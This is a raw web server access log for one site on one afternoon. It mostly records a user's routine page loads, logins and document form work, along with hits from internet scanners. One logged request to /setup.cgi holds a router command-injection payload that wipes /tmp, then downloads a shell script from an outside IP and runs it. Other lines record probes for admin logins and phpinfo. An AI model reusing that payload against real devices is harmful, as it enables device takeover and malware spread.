77.119.161.159 - - [29/Apr/2025:16:26:28 +0200] "GET /entry.php?id=10271&&ser=936727 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=936666" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
77.119.161.159 - - [29/Apr/2025:16:26:28 +0200] "GET /gui/javascript/form_form.js?1745936788 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=936727" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
77.119.161.159 - - [29/Apr/2025:16:27:03 +0200] "GET /entry.php?id=10271&&ser=936763 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=936703" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:16:27:03 +0200] "GET /gui/javascript/form_form.js?1745936823 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=936763" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:16:27:29 +0200] "GET /entry.php?id=10271&&ser=936788 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=936727" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
77.119.161.159 - - [29/Apr/2025:16:27:29 +0200] "GET /gui/javascript/form_form.js?1745936849 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=936788" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
77.119.161.159 - - [29/Apr/2025:16:28:04 +0200] "GET /entry.php?id=10271&&ser=936823 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=936763" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:16:28:04 +0200] "GET /gui/javascript/form_form.js?1745936884 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=936823" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:16:28:30 +0200] "GET /entry.php?id=10271&&ser=936849 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=936788" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
77.119.161.159 - - [29/Apr/2025:16:28:30 +0200] "GET /gui/javascript/form_form.js?1745936910 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=936849" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
77.119.161.159 - - [29/Apr/2025:16:29:04 +0200] "GET /entry.php?id=10271&&ser=936884 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=936823" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:16:29:04 +0200] "GET /gui/javascript/form_form.js?1745936944 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=936884" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:16:29:31 +0200] "GET /entry.php?id=10271&&ser=936910 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=936849" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
77.119.161.159 - - [29/Apr/2025:16:29:31 +0200] "GET /gui/javascript/form_form.js?1745936971 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=936910" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
77.119.161.159 - - [29/Apr/2025:16:30:04 +0200] "GET /entry.php?id=10271&&ser=936944 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=936884" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:16:30:05 +0200] "GET /gui/javascript/form_form.js?1745937004 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=936944" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:16:30:32 +0200] "GET /entry.php?id=10271&&ser=936971 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=936910" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
77.119.161.159 - - [29/Apr/2025:16:30:32 +0200] "GET /gui/javascript/form_form.js?1745937032 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=936971" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
77.119.161.159 - - [29/Apr/2025:16:31:05 +0200] "GET /entry.php?id=10271&&ser=937004 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=936944" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:16:31:05 +0200] "GET /gui/javascript/form_form.js?1745937065 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=937004" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:16:31:33 +0200] "GET /entry.php?id=10271&&ser=937032 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=936971" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
77.119.161.159 - - [29/Apr/2025:16:31:33 +0200] "GET /gui/javascript/form_form.js?1745937093 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=937032" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
77.119.161.159 - - [29/Apr/2025:16:32:06 +0200] "GET /entry.php?id=10271&&ser=937065 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=937004" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:16:32:06 +0200] "GET /gui/javascript/form_form.js?1745937126 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=937065" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:16:32:34 +0200] "GET /entry.php?id=10271&&ser=937093 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=937032" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
77.119.161.159 - - [29/Apr/2025:16:32:34 +0200] "GET /gui/javascript/form_form.js?1745937154 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=937093" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
77.119.161.159 - - [29/Apr/2025:16:33:06 +0200] "GET /entry.php?id=10271&&ser=937126 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=937065" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:16:33:06 +0200] "GET /gui/javascript/form_form.js?1745937186 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=937126" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:16:33:35 +0200] "GET /entry.php?id=10271&&ser=937154 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=937093" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
77.119.161.159 - - [29/Apr/2025:16:33:35 +0200] "GET /gui/javascript/form_form.js?1745937215 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=937154" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
77.119.161.159 - - [29/Apr/2025:16:34:06 +0200] "GET /entry.php?id=10271&&ser=937186 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=937126" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:16:34:06 +0200] "GET /gui/javascript/form_form.js?1745937246 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=937186" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:16:34:36 +0200] "GET /entry.php?id=10271&&ser=937215 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=937154" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
77.119.161.159 - - [29/Apr/2025:16:34:36 +0200] "GET /gui/javascript/form_form.js?1745937276 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=937215" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
77.119.161.159 - - [29/Apr/2025:16:35:07 +0200] "GET /entry.php?id=10271&&ser=937246 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=937186" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:16:35:07 +0200] "GET /gui/javascript/form_form.js?1745937307 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=937246" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
154.81.156.7 - - [29/Apr/2025:16:37:44 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
176.65.148.10 - - [29/Apr/2025:16:46:42 +0200] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd+/tmp;rm+-rf+*;wget+http://94.26.90.205/netgear.sh;chmod+777+netgear.sh;sh+netgear.sh;&curpath=/¤tsetting.htm=1; HTTP/1.1" 404 354 "-" "Go-http-client/1.1"
154.81.156.54 - - [29/Apr/2025:16:47:39 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
160.250.247.221 - - [29/Apr/2025:16:50:01 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 293 "http://212.69.160.11:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
80.82.77.202 - - [29/Apr/2025:16:50:59 +0200] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) snap Chromium/76.0.3809.100 Chrome/76.0.3809.100 Safari/537.36"
185.189.182.234 - - [29/Apr/2025:16:51:27 +0200] "GET / HTTP/1.1" 400 383 "-" "-"
93.174.93.12 - - [29/Apr/2025:16:51:38 +0200] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20120502 Firefox/12.0 SeaMonkey/2.9.1"
77.119.161.159 - - [29/Apr/2025:16:59:44 +0200] "GET /entry.php?id=10828 HTTP/1.1" 200 9140 "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:16:59:44 +0200] "GET /gui/javascript/form_form.js?1745938784 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10828" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:16:59:44 +0200] "GET /entry.php?id=10889&document_id=& HTTP/1.1" 200 1508 "http://hausegger.activities.at/entry.php?id=10828" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
92.255.57.58 - - [29/Apr/2025:17:02:25 +0200] "\x16\x03\x01\x05\xa8\x01" 400 383 "-" "-"
77.119.161.159 - - [29/Apr/2025:17:16:49 +0200] "GET /entry.php?id=10287&login=1 HTTP/1.1" 200 1878 "http://hausegger.activities.at/entry.php?id=10273&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
77.119.161.159 - - [29/Apr/2025:17:16:49 +0200] "GET /gui/javascript/form_form.js?1745939809 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10287&login=1" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
77.119.161.159 - - [29/Apr/2025:17:16:51 +0200] "POST /entry.php?id=10287& HTTP/1.1" 200 2433 "http://hausegger.activities.at/entry.php?id=10287&login=1" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
77.119.161.159 - - [29/Apr/2025:17:16:51 +0200] "GET /gui/javascript/form_form.js?1745939811 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
77.119.161.159 - - [29/Apr/2025:17:16:51 +0200] "GET /entry.php?id=10270& HTTP/1.1" 200 909 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
77.119.161.159 - - [29/Apr/2025:17:16:51 +0200] "GET /entry.php?id=10273&logout=true& HTTP/1.1" 200 1913 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
77.119.161.159 - - [29/Apr/2025:17:16:52 +0200] "GET /gui/javascript/form_form.js?1745939812 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10270&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
154.81.156.54 - - [29/Apr/2025:17:20:50 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
167.94.145.98 - - [29/Apr/2025:17:27:20 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.98 - - [29/Apr/2025:17:27:21 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.98 - - [29/Apr/2025:17:27:21 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.98 - - [29/Apr/2025:17:27:21 +0200] "PRI * HTTP/2.0" 400 383 "-" "-"
167.94.145.98 - - [29/Apr/2025:17:27:24 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.98 - - [29/Apr/2025:17:27:24 +0200] "\x16\x03\x01" 400 383 "-" "-"
154.81.156.35 - - [29/Apr/2025:17:40:00 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.7 - - [29/Apr/2025:17:53:18 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
154.81.156.54 - - [29/Apr/2025:17:58:14 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.218.86.4 - - [29/Apr/2025:18:09:50 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
101.33.66.34 - - [29/Apr/2025:18:20:43 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
154.81.156.54 - - [29/Apr/2025:18:29:29 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
5.183.209.244 - - [29/Apr/2025:18:51:34 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 371 "-" "-"
219.153.113.100 - - [29/Apr/2025:18:52:37 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; KB974488)"
219.153.113.100 - - [29/Apr/2025:18:52:38 +0200] "GET /layout.php%22,%20%22_blank%22,%20%22resizable=yes,%20scrollbars=no,%20outerwidth=1024,%20outerheight=734 HTTP/1.1" 404 451 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; KB974488)"
194.50.16.252 - - [29/Apr/2025:18:53:18 +0200] "GET /phpinfo.php HTTP/1.1" 200 10222 "-" "Mozilla/5.0 (Debian; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0"
185.218.84.178 - - [29/Apr/2025:18:59:11 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.54 - - [29/Apr/2025:19:00:46 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
77.119.161.159 - - [29/Apr/2025:19:01:56 +0200] "GET /entry.php?id=11237&type=10665 HTTP/1.1" 200 276 "http://hausegger.activities.at/entry.php?id=10828" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:19:01:57 +0200] "GET /entry.php?id=11238&mode=document&form=10665& HTTP/1.1" 200 3302 "http://hausegger.activities.at/entry.php?id=11237&type=10665" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:19:01:57 +0200] "GET /entry.php?id=10676&&title=Belegsuche HTTP/1.1" 200 1391 "http://hausegger.activities.at/entry.php?id=11237&type=10665" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:19:01:57 +0200] "GET /gui/javascript/form_bu_document_workflow.js?1745946117 HTTP/1.1" 200 4900 "http://hausegger.activities.at/entry.php?id=11238&mode=document&form=10665&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:19:01:57 +0200] "GET /gui/javascript/form_form.js?1745946117 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=11238&mode=document&form=10665&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:19:01:57 +0200] "GET /gui/javascript/form_form.js?1745946117 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10676&&title=Belegsuche" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:19:01:57 +0200] "GET /entry.php?id=11239&mode=document&form=10665& HTTP/1.1" 200 2017 "http://hausegger.activities.at/entry.php?id=11237&type=10665" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:19:01:57 +0200] "GET /framework/icons/treeview/ftv2doc.gif HTTP/1.1" 200 199 "http://hausegger.activities.at/entry.php?id=11239&mode=document&form=10665&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:19:01:57 +0200] "GET /entry.php?id=11240&mode=document&form=10665& HTTP/1.1" 200 2665 "http://hausegger.activities.at/entry.php?id=11237&type=10665" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:19:01:57 +0200] "GET /entry.php?id=10776&form=11066&name=list& HTTP/1.1" 200 1513 "http://hausegger.activities.at/entry.php?id=11240&mode=document&form=10665&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:19:01:57 +0200] "GET /entry.php?id=10778&form=11066&name=list& HTTP/1.1" 200 2586 "http://hausegger.activities.at/entry.php?id=11240&mode=document&form=10665&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:19:01:57 +0200] "GET /framework/icons/fwx_trans.gif HTTP/1.1" 200 43 "http://hausegger.activities.at/entry.php?id=10776&form=11066&name=list&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:19:01:58 +0200] "POST /entry.php?id=11240 HTTP/1.1" 200 2672 "http://hausegger.activities.at/entry.php?id=11240&mode=document&form=10665&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:19:01:58 +0200] "GET /gui/javascript/form_bu_document_workflow.js?1745946118 HTTP/1.1" 200 4900 "http://hausegger.activities.at/entry.php?id=11240" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:19:01:58 +0200] "GET /gui/javascript/form_form.js?1745946118 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=11240" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:19:01:58 +0200] "GET /entry.php?id=10776&form=11066&name=list& HTTP/1.1" 200 1513 "http://hausegger.activities.at/entry.php?id=11240" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:19:01:58 +0200] "GET /entry.php?id=10778&form=11066&name=list& HTTP/1.1" 200 2924 "http://hausegger.activities.at/entry.php?id=11240" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:19:02:03 +0200] "GET /framework/icons/rowselect.gif HTTP/1.1" 200 67 "http://hausegger.activities.at/entry.php?id=10778&form=11066&name=list&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:19:02:06 +0200] "POST /entry.php?id=10828 HTTP/1.1" 200 8711 "http://hausegger.activities.at/entry.php?id=10828" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:19:02:06 +0200] "GET /gui/javascript/form_form.js?1745946126 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10828" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:19:02:06 +0200] "GET /entry.php?id=10889&document_id=10350460& HTTP/1.1" 200 1509 "http://hausegger.activities.at/entry.php?id=10828" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:19:02:09 +0200] "POST /entry.php?id=10828 HTTP/1.1" 200 8769 "http://hausegger.activities.at/entry.php?id=10828" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:19:02:09 +0200] "GET /gui/javascript/form_form.js?1745946129 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10828" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:19:02:09 +0200] "GET /entry.php?id=10889&document_id=10350460& HTTP/1.1" 200 1508 "http://hausegger.activities.at/entry.php?id=10828" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:19:02:10 +0200] "GET /gui/javascript/form_form.js?1745946130 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10889&document_id=10350460&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:19:02:47 +0200] "GET /entry.php?id=10831 HTTP/1.1" 200 8823 "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:19:02:47 +0200] "GET /gui/javascript/form_form.js?1745946167 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10831" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:19:02:48 +0200] "GET /entry.php?id=10889&document_id=& HTTP/1.1" 200 1508 "http://hausegger.activities.at/entry.php?id=10831" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:19:02:48 +0200] "GET /gui/javascript/form_form.js?1745946168 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10889&document_id=&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:19:02:49 +0200] "GET /entry.php?id=11237&type=10668 HTTP/1.1" 200 276 "http://hausegger.activities.at/entry.php?id=10831" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
